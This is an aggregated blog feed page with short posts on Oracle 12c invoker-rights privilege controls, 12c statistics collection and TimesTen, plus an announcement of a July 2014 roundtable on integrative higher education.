A few years ago, Oracle acquired TimesTen. TimesTen is an in-memory database that works differently: you get very fast response times (microseconds?), but you could lose transactions (better fast than zero data loss). While TimesTen improves transaction speed, In-Memory mostly improves queries, not writes.

Invoker Rights in Oracle Database 12c : Some more articles

Tim Hall - Wed, 2014-07-09 05:03

I wrote about the Code Based Access Control (CBAC) stuff in Oracle Database 12c a while back.

I’ve recently “completed the set” by looking at the INHERIT PRIVILEGES and BEQUEATH CURRENT_USER stuff for PL/SQL code and views respectively.
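
As a hedged sketch of the syntax involved (object names are hypothetical; see the articles for the details):

-- BEQUEATH CURRENT_USER: invoker-rights functions referenced by the view
-- run with the privileges of the querying user, not the view owner.
CREATE OR REPLACE VIEW emp_v BEQUEATH CURRENT_USER AS
SELECT * FROM emp;

-- INHERIT PRIVILEGES: stop invoker-rights code run by a powerful user
-- from borrowing that user's privileges.
REVOKE INHERIT PRIVILEGES ON USER system FROM PUBLIC;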

It’s pretty cool, but I’m not sure how much of it I will see in the wild as it will require developers to do a bit more thinking, rather than doing what they’ve always done… :)

Cheers

Tim…


12c Index Like Table Statistics Collection (Wearing The Inside Out)

Richard Foote - Wed, 2014-07-09 02:14
This change introduced in 12c has caught me out on a number of occasions. If you were to create a new table and then populate it with a conventional insert, we find there are no statistics associated with the table until we explicitly collect them. But if we were to now create an index on this […]
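
A sketch of those first steps (table name hypothetical):

CREATE TABLE ziggy (id NUMBER, name VARCHAR2(42));

INSERT INTO ziggy SELECT rownum, 'ZIGGY' FROM dual CONNECT BY level <= 10000;
COMMIT;

-- a conventional insert gathers no table statistics; LAST_ANALYZED is still NULL
SELECT num_rows, last_analyzed FROM user_tables WHERE table_name = 'ZIGGY';

-- ...until we collect them explicitly
EXEC DBMS_STATS.GATHER_TABLE_STATS(ownname => USER, tabname => 'ZIGGY')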
Categories: DBA Blogs

Roundtable Discussion on Integrative Education July 9th at 2pm EDT

Michael Feldstein - Tue, 2014-07-08 16:19

Tomorrow, July 9th at 2:00pm EDT, I’ll join a great cast to discuss Reinvent the University for the Whole Person: Principles Driving Policy, and I hope many of you can watch. The other participants:

  • Randy Bass (Vice Provost for Education and Professor of English at Georgetown University)
  • Martha Kanter (Distinguished Visiting Professor of Higher Education at New York University & former U.S. Under Secretary of Education)
  • Robert Groves (Provost at Georgetown University)
  • Jeffrey Selingo (Author of College (Un)Bound: The Future of Higher Education and What It Means for Students)
  • Tia Brown McNair (Senior Director for Student Success at the Association of American Colleges & Universities)
  • Anthony Carnevale (Director of the Center on Education & the Workforce at Georgetown University)


The core idea for the series:

American higher education rarely has been more in the national spotlight than with the arrival of new digital technologies and new for-profit education businesses, among other big trends. In this rapidly changing landscape, the old model looks increasingly outmoded and many efforts are underway to begin to transform the system for the 21st century. Most efforts are focusing on making the system more efficient and producing a larger number of graduates to fit in a changing economy.

Very little thought is going into other valuable contributions that universities have provided in the past. Universities also produce future citizens, problem–solvers, leaders – not to mention knowledge that can drive innovation and economic growth. How do we ensure that these other critical outcomes will continue in the future? How can we build on new insights about learning and invent new ways to deliver and measure education that matters for a lifetime? How can we use new tools and approaches that are only available now to carry out the mission of educating for the whole person even better than before?

For the roundtable tomorrow, we’ll discuss:

What are the opportunities for shaping public policy for integrative education in a world that also needs more access, lower costs and workplace preparation? How do we ensure this focus is not elitist?

You can access the discussion on the Reinventors website here.

You can access the discussion within Google+ here.

The post Roundtable Discussion on Integrative Education July 9th at 2pm EDT appeared first on e-Literate.